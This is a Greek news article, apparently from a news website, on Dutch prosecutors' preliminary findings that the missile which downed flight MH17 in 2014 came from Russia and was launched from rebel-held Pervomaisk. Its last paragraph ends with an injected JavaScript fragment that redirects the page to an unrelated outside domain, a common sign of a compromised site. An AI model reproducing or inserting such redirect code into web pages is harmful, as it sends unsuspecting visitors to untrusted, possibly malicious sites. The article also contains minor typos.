Από τη φιλορωσική πλευρά ο πύραυλος που κατέρριψε την πτήση ΜΗ17 στην Ουκρανία

0
13

 

Από τη Ρωσία είχε μεταφερθεί ο πύραυλος που κατέρριψε την πτήση MH17 της Malaysia Ailines στις 17 Ιουλίου 2014 στην ανατολική Ουκρανία σύμφωνα με την ολλανδική εισαγγελία που παρουσίασε παρουσιάζοντας τα πρώτα συμπεράσματα των διεθνών ερευνητών.

Έπειτα από έρευνα, φαίνεται πως ο πύραυλος εκτοξεύθηκε από το χωριό Περβομάισκ το οποίο ελέγχεται από τους φιλορώσους αντάρτες και πως, μετά την κατάρριψη του μαλαισιανού αεροπλάνου, το πυραυλικό σύστημα επέστρεψε στη Ρωσία.

Οι διεθνείς ερευνητές σημείωσαν ότι δεν είναι σαφές αν οι στρατιώτες διατάχθηκαν να εκτοξεύσουν τον πύραυλο ή ενήργησαν ανεξάρτητα και πως δεν θα σχολιάσουν ενδεχόμενη εμπλοκή της Ρωσίας.

Μάλιστα, σημείωσαν πως έχουν εντοπίσει 100 πρόσωπα ενδιαφέροντος, αλλά δεν έχουν ακόμη προσδιορίσει μεμονωμένους υπόπτους. Σύμφωνα ωστόσο με ερευνητή, υπάρχουν «ρεαλιστικές πιθανότητες» να ασκηθεί δίωξη σε βάρος των ενόχων για την κατάρριψη του επιβατικού αεροπλάνου. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here